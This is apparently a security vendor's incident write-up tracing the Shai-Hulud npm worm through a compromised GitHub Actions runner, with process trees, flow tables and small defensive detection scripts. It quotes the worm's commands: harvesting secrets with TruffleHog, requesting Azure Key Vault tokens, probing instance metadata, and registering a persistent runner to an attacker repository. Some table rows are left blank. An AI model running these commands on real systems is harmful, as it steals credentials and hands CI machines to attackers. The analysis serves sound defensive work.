

Most Shai-Hulud coverage describes the aftermath: which packages were trojanized, what leaked, which tokens to rotate. This post is different—it's what the attack looked like while it was running, captured from inside one of our GitHub Actions runners.

A routine workflow pulled a compromised dependency. Our runner was already instrumented with Garnet. What follows is the runtime record: process ancestry, filesystem staging, network flows, and an infrastructure hijack attempt that reframes what this campaign is actually trying to achieve.

The complete attack tree

Before diving into the phases, here's the full picture—every significant process and network event Garnet captured, organized by ancestry:

```text
systemd
└── hosted-compute-agent
    └── Runner.Listener
        └── Runner.Worker
            └── bash
                └── npm install @seung-ju/react-native-action-sheet@0.2.1
                    └── sh -c "node setup_bun.js"
                        └── node setup_bun.js
                            └── bun bun_environment.js
                                ├── config.sh --url github.com/Cpreet/... --name SHA1HULUD
                                ├── az account get-access-token --resource https://vault.azure.net
                                ├── 169.254.169.254:80 (Azure IMDS probe)
                                ├── nohup ./run.sh
                                └── trufflehog filesystem /home/runner --json
                                    ├── oss.trufflehog.org:443
                                    ├── api.box.com:443
                                    ├── dc.services.visualstudio.com:443
                                    ├── raw.githubusercontent.com:443
                                    ├── release-assets.githubusercontent.com:443
                                    └── api.tomorrow.io:443 → BLOCKED
```

Everything below bun bun_environment.js is the attack. The runtime pivot from Node to Bun is the hinge point: after that, the payload runs TruffleHog, probes cloud credentials, attempts to hijack the runner, and reaches out to destinations that don't belong in CI.

The rest of this post walks through each branch of that tree: what we observed, what the network flows tell us, and where policy enforcement cut the chain.

Phase 1: Entry and the Bun pivot

The compromised package triggered on install:

```bash
npm install @seung-ju/react-native-action-sheet@0.2.1
```

The preinstall hook immediately spawned a shell:

```bash
sh -c "node setup_bun.js"
```

setup_bun.js checked for Bun, installed it if missing, then handed control to bun_environment.js. From this point forward, all malicious behavior executed under Bun, outside the scope of Node-centric security hooks.

This runtime switch is deliberate evasion. Most npm security tooling assumes execution stays in Node.
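The entry point was an install-time hook. One cheap check is therefore to list the lifecycle scripts a package declares before npm runs them. The sketch below is illustrative and not part of Garnet. The helper lifecycle_hooks and the sample manifest are hypothetical. The helper covers only preinstall, install, and postinstall, which npm runs automatically when a dependency is installed.

```python
import json

# Lifecycle scripts npm runs automatically when a dependency is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def lifecycle_hooks(manifest_text: str) -> dict[str, str]:
    """Return the install-time lifecycle scripts declared in a package.json string."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts", {})
    return {name: scripts[name] for name in INSTALL_HOOKS if name in scripts}


if __name__ == "__main__":
    # Hypothetical manifest shaped like the one in this incident.
    sample = json.dumps({
        "name": "example-package",
        "version": "0.0.1",
        "scripts": {"preinstall": "node setup_bun.js", "test": "jest"},
    })
    for hook, command in lifecycle_hooks(sample).items():
        print(f"{hook}: {command}")
```

Running npm install with --ignore-scripts (or setting ignore-scripts=true in .npmrc) stops these hooks from running at all. The cost is breaking packages that genuinely need an install step.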



Phase 2: Staging and secret harvesting

Once running under Bun, the payload staged its tools in ~/.dev-env/ and launched TruffleHog:

```bash
trufflehog filesystem /home/runner --json
```

Network flows during harvesting

As TruffleHog scanned and validated credentials, Garnet captured the outbound connections:

| Destination | Purpose | Garnet Classification |
|---|---|---|
| oss.trufflehog.org:443 | TruffleHog update/validation endpoint | Allowed (dual-use) |
| api.box.com:443 | Box API credential validation | Allowed (dual-use) |
| dc.services.visualstudio.com:443 | Azure DevOps credential validation | Allowed (dual-use) |
| raw.githubusercontent.com:443 | | |

Every one of these destinations is consistent with legitimate TruffleHog behavior, which is exactly the problem. The traffic alone doesn't tell you whether this is your security team running scans or a worm doing the same thing.

What makes it suspicious: process ancestry. These connections came from trufflehog spawned by bun_environment.js, which descended from the malicious package's preinstall hook—not from any workflow step we defined.
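Tying a connection back to the package comes down to walking parent pointers from the process that opened it. The sketch below assumes a hypothetical, simplified event model: each pid maps to a parent pid and a command line. The pids are made up, and the tree is a trimmed version of the one above. This is not Garnet's schema.

```python
from typing import NamedTuple, Optional


class Proc(NamedTuple):
    ppid: Optional[int]  # None for the root of the tree
    cmdline: str


def ancestry(procs: dict[int, Proc], pid: int) -> list[str]:
    """Return command lines from pid up to the root, nearest first."""
    chain: list[str] = []
    seen: set[int] = set()
    current: Optional[int] = pid
    while current is not None and current in procs and current not in seen:
        seen.add(current)  # guard against cycles caused by pid reuse
        proc = procs[current]
        chain.append(proc.cmdline)
        current = proc.ppid
    return chain


def descends_from(procs: dict[int, Proc], pid: int, marker: str) -> bool:
    """True if any ancestor (excluding pid itself) has marker in its command line."""
    return any(marker in cmd for cmd in ancestry(procs, pid)[1:])


# Hypothetical pids for a trimmed slice of the attack tree.
TREE = {
    1: Proc(None, "systemd"),
    10: Proc(1, "Runner.Worker"),
    11: Proc(10, "bash"),
    12: Proc(11, "npm install @seung-ju/react-native-action-sheet@0.2.1"),
    13: Proc(12, "node setup_bun.js"),
    14: Proc(13, "bun bun_environment.js"),
    15: Proc(14, "trufflehog filesystem /home/runner --json"),
    20: Proc(11, "npm test"),
}

if __name__ == "__main__":
    print(descends_from(TREE, 15, "bun_environment.js"))  # True
    print(descends_from(TREE, 20, "bun_environment.js"))  # False
```

The check excludes the process itself, so it answers "who launched this?" That is the question the trufflehog connections raised.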

We observed multiple harvesting passes over the job's lifetime, not a single scan. This re-harvesting pattern is designed to catch secrets that appear mid-workflow—tokens fetched by later steps, env vars set after install.

Phase 3: Cloud credential probing

The payload attempted to escalate from CI-level to cloud-level access with two techniques:

Azure Key Vault token request:

```bash
az account get-access-token --resource https://vault.azure.net
```

Instance metadata probe:

```text
169.254.169.254:80
```

Both appeared under the bun_environment.js ancestry. If the runner had a managed identity or federated workload identity configured, these calls could have returned tokens with broader scope than the secrets explicitly wired into the workflow.

The metadata endpoint (169.254.169.254) is a classic IMDS hit—the same technique used across AWS, GCP, and Azure to steal temporary credentials from compute instances.
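On the network side, metadata probes are easy to key on because the address is fixed. 169.254.169.254 sits in the IPv4 link-local block 169.254.0.0/16, which Python's standard ipaddress module exposes as is_link_local. The classify_destination helper and its labels are hypothetical. This is a sketch of how flow records might be tagged, not how Garnet classifies them.

```python
import ipaddress

# Instance metadata address used by AWS, GCP, and Azure.
IMDS_ADDR = ipaddress.ip_address("169.254.169.254")


def classify_destination(ip: str) -> str:
    """Label a flow's destination IP (hypothetical labels, for illustration)."""
    addr = ipaddress.ip_address(ip)
    if addr == IMDS_ADDR:
        return "imds"
    # Check link-local before private: Python also counts 169.254.0.0/16 as private.
    if addr.is_link_local:
        return "link-local"
    if addr.is_private:
        return "private"
    return "external"


if __name__ == "__main__":
    # Hypothetical (process, destination) pairs drawn from the attack tree.
    flows = [
        ("bun bun_environment.js", "169.254.169.254"),
        ("trufflehog", "140.82.116.4"),
    ]
    for proc, ip in flows:
        print(proc, ip, classify_destination(ip))
```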

Phase 4: The runner hijack attempt

This was the most significant observation—and the one that reframes what the campaign is actually after.

We captured a complete self-hosted runner installation sequence under the malicious ancestry:

```bash
mkdir -p ~/.dev-env
cd ~/.dev-env
curl ... > actions-runner-linux-x64-2.330.0.tar.gz
tar xzf actions-runner-linux-x64-2.330.0.tar.gz
RUNNER_ALLOW_RUNASROOT=1 ./config.sh \
  --url https://github.com/Cpreet/lr8su68xsi5ew60p6k \
  --unattended \
  --token <redacted> \
  --name "SHA1HULUD"
nohup ./run.sh &
```

The sequence:

- Downloads the official GitHub Actions runner into a hidden directory

- Registers it to an attacker-controlled repository (Cpreet/lr8su68xsi5ew60p6k)

- Names it SHA1HULUD

- Starts it under nohup to persist after the original workflow ends

This isn't credential theft—it's infrastructure capture. A stolen token expires or gets revoked. A registered runner is a programmable machine inside your perimeter that answers to someone else's workflows.

We cannot confirm from our telemetry alone whether the registration succeeded or attacker workflows executed—that requires GitHub audit logs. What we can confirm: the full registration sequence ran under the malicious process tree.
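The registration step is distinctive enough to match directly if you already collect exec events as argument lists. The sketch below assumes argv capture and a hypothetical ALLOWED_OWNERS set naming the GitHub owners your runners may register against. It looks only at the two flags visible in the captured sequence, --unattended and --url. It flags any target owner outside that set.

```python
from typing import Optional
from urllib.parse import urlparse

# Hypothetical: GitHub owners (orgs or users) your runners may register against.
ALLOWED_OWNERS = {"your-org"}


def flag_runner_registration(argv: list[str]) -> Optional[str]:
    """Return the --url target if argv looks like an unapproved runner registration."""
    # Match anywhere in argv: exec telemetry may record the interpreter
    # (for example /bin/bash) ahead of the script path.
    if not any(arg.endswith("config.sh") for arg in argv):
        return None
    if "--unattended" not in argv:
        return None
    try:
        url = argv[argv.index("--url") + 1]
    except (ValueError, IndexError):
        return None  # no --url value to evaluate
    # Accept "https://github.com/owner/repo" as well as "github.com/owner/repo".
    path = urlparse(url if "://" in url else "https://" + url).path
    owner = path.strip("/").split("/")[0]
    return None if owner in ALLOWED_OWNERS else url


if __name__ == "__main__":
    captured = ["./config.sh", "--url", "https://github.com/Cpreet/lr8su68xsi5ew60p6k",
                "--unattended", "--token", "<redacted>", "--name", "SHA1HULUD"]
    print(flag_runner_registration(captured))
```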



Phase 5: The egress that didn't fit

Most outbound traffic during the attack was dual-use: TruffleHog endpoints, GitHub APIs, cloud services. Ambiguous on its own.

One destination had no legitimate explanation:

```text
api.tomorrow.io:443
```

Why this connection stood out

| Attribute | Value |
|---|---|
| Destination | api.tomorrow.io:443 (weather API) |
| Process ancestry | bun_environment.js → malicious package |
| Timing | After harvesting and cloud access phases |
| Workflow step | None—no corresponding job step |
| Baseline match | None—never seen in our CI |

A weather API has no business appearing in a CI pipeline. It appeared under the malicious ancestry, after the payload had already run its harvesting and cloud probing phases.

In runs with egress policy enforced, Garnet dropped the connection:

```text
Destination: api.tomorrow.io:443
Class: network_exfiltration
State: blocked
Priority: critical
Action: Connection dropped at network boundary
```

What we claim: This was a suspicious outbound connection from the malware's process tree that, under policy, didn't complete.

What we don't claim: That this was the only exfiltration path, or that blocking it prevented all data loss. The dual-use traffic to TruffleHog validation endpoints and GitHub could have carried data we couldn't inspect.



Network flow summary

Garnet's network flow graph shows the complete picture—every outbound connection from the compromised runner, with flow counts and destination IPs:

Here's the breakdown of what each connection represents:

| Destination | IP | Flows | Purpose | Action |
|---|---|---|---|---|
| github.com | 140.82.116.4 | 1 | Code hosting / runner download | Allowed |
| gitlab.com | 172.65.251.78 | 1 | Credential validation | Allowed |
| keychecker.trufflesecurity.com | 151.101.202.132 | | | |

The "Allowed" connections are dual-use—they're what TruffleHog and GitHub runners legitimately contact. The value isn't in blocking them individually; it's in having the process ancestry to tie them back to the malicious package.

The api.tomorrow.io connection is the exception: a destination with no legitimate CI purpose, reached from malicious ancestry, blocked by egress policy.

What we observed vs. what we infer

| Observation (Garnet telemetry) | Evidence |
|---|---|
| Package executed | @seung-ju/react-native-action-sheet@0.2.1 |
| Runtime pivot | Node → Bun via setup_bun.js → bun_environment.js |
| Secret scanning | trufflehog processes, validation traffic to 5 external APIs |
| Cloud probing | Azure Key Vault token request, 169.254.169.254 metadata access |

We infer:

- The runner hijack was intended for persistent attacker compute

- Re-harvesting was designed to catch late-appearing credentials

- api.tomorrow.io was part of the malicious behavior (no legitimate CI role)

We don't know:

- Whether the runner registration succeeded

- Whether data exfiltrated via dual-use channels

- The payload of any encrypted requests

What you can do

Hunt for infrastructure capture:

- Audit self-hosted runners for unexpected names (including SHA1HULUD)

- Search for hidden directories containing config.sh, run.sh, and runner binaries

- Flag config.sh --unattended --url <unknown repo> from unusual paths
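The directory search can be sketched with the standard library. It walks a root and reports hidden directories that contain both config.sh and run.sh, the two scripts the captured sequence invoked from ~/.dev-env. The root path and the two-file heuristic are assumptions. A legitimate self-hosted runner installed in a dot-directory would also match, so treat hits as leads to check against your runner inventory.

```python
import os
from pathlib import Path

# Scripts the captured registration sequence invoked from ~/.dev-env.
RUNNER_SCRIPTS = {"config.sh", "run.sh"}


def find_hidden_runner_dirs(root: str) -> list[Path]:
    """Return hidden directories under root that contain every script in RUNNER_SCRIPTS."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        path = Path(dirpath)
        # Hidden if any path component below root starts with ".".
        hidden = any(part.startswith(".") for part in path.relative_to(root).parts)
        if hidden and RUNNER_SCRIPTS.issubset(filenames):
            hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for hit in find_hidden_runner_dirs(os.path.expanduser("~")):
        print(hit)
```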

Constrain CI egress:

- Baseline the domains your CI actually needs

- Block or scrutinize everything else—especially generic SaaS endpoints

- Enforce as policy, not just detection
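Here is a minimal sketch of baseline-then-enforce. It assumes you already have per-job lists of destination hostnames. Suffix matching lets one entry such as githubusercontent.com cover its subdomains. Anything outside the baseline is returned for blocking or review. The BASELINE entries are placeholders, not a recommended list.

```python
# Hypothetical baseline: domains this CI is expected to reach.
BASELINE = {"github.com", "githubusercontent.com", "registry.npmjs.org"}


def in_baseline(host: str, baseline: set[str]) -> bool:
    """True if host equals a baseline domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    # Requiring a leading dot keeps "evilgithub.com" from matching "github.com".
    return any(host == d or host.endswith("." + d) for d in baseline)


def unexpected(hosts: list[str], baseline: set[str] = BASELINE) -> list[str]:
    """Return destinations outside the baseline, in first-seen order."""
    out: list[str] = []
    for h in hosts:
        if not in_baseline(h, baseline) and h not in out:
            out.append(h)
    return out


if __name__ == "__main__":
    observed = ["raw.githubusercontent.com", "github.com",
                "api.tomorrow.io", "api.box.com", "api.tomorrow.io"]
    print(unexpected(observed))  # ['api.tomorrow.io', 'api.box.com']
```

Under this placeholder baseline, api.box.com would also surface for review. That is the intent of scrutinizing generic SaaS endpoints rather than allowing them by default.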

Get runtime visibility:

- Process ancestry tied to workflow context

- Network flows with process identity

- Enough retention to reconstruct "what happened" across a job

The question this leaves

We built Garnet to get this view into our own CI—to see attacks as they execute, not just their artifacts afterward.

In this case, that meant reconstructing the full chain from npm install to egress attempt, and enforcing at the network boundary when something didn't belong.

If this ran on your runners today, would you see it? Would anything stop the parts you care about?

We have an answer for our environment. This post is meant to help you find yours.

Related: For a deeper dive into the Shai-Hulud campaign, see our threat research analysis.

For runtime visibility and egress control in CI/CD, see garnet.ai.